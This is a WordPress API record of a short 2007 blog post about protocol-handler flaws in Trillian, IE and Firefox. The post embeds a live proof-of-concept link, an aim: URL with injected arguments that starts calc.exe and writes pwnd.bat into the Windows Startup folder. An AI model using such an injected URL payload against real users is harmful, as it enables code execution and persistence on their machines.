{"id":320,"date":"2007-07-15T08:57:45","date_gmt":"2007-07-15T12:57:45","guid":{"rendered":"http:\/\/www.thewormbook.com\/hlog\/?p=320"},"modified":"2007-07-15T08:57:45","modified_gmt":"2007-07-15T12:57:45","slug":"security-horrors","status":"publish","type":"post","link":"http:\/\/www.thewormbook.com\/hlog\/?p=320","title":{"rendered":"security horrors"},"content":{"rendered":"<p>Trillian, <span class=\"caps\">IE, <\/span>and Firefox all turn out to be <a href=\"http:\/\/www.oreillynet.com\/onlamp\/blog\/2007\/07\/not_for_the_faint_of_heart_mul.html\">vulnerable to nasty attacks<\/a> which will take some months to fix. I was particularly horrified by the fact that the authors have encoded an entire Google page into an <span class=\"caps\">URL <\/span>&#8212; it doesn&#8217;t lead there: it just causes Firefox to generate a picture of the page. Also, the Trillian exploit does work. Click <a href=\"http:\/\/aim:+&amp;c:\\windows\\system32\\calc.exe\"+ini=\"C:\\Documents+and+Settings\\All+Users\\Start+Menu\\Programs\\Startup\\pwnd.bat\"\">on the <span class=\"caps\">URL<\/span><\/a> and <span class=\"loony\">pwnd.bat<\/span> really does get written to your system.<\/p>\n\n<p>Urgh.<\/p>\n\n<p><span class=\"caps\">UPDATE<\/span>: Rafe Coburn <a href=\"http:\/\/rc3.org\/2007\/07\/safari_30_is_ah.php\">explains<\/a> how this works.<\/p>","protected":false},"excerpt":{"rendered":"<p>Trillian, <span class=\"caps\">IE, <\/span>and Firefox all turn out to be vulnerable to nasty attacks which will take some months to fix. I was particularly horrified by the fact that the authors have encoded an entire Google page into an <span class=\"caps\">URL <\/span>&#8212; &hellip; <a href=\"http:\/\/www.thewormbook.com\/hlog\/?p=320\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a> <a href=\"http:\/\/www.thewormbook.com\/hlog\/?p=320\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"_links":{"self":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/posts\/320"}],"collection":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=320"}],"version-history":[{"count":0,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/posts\/320\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=320"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=320"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=320"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}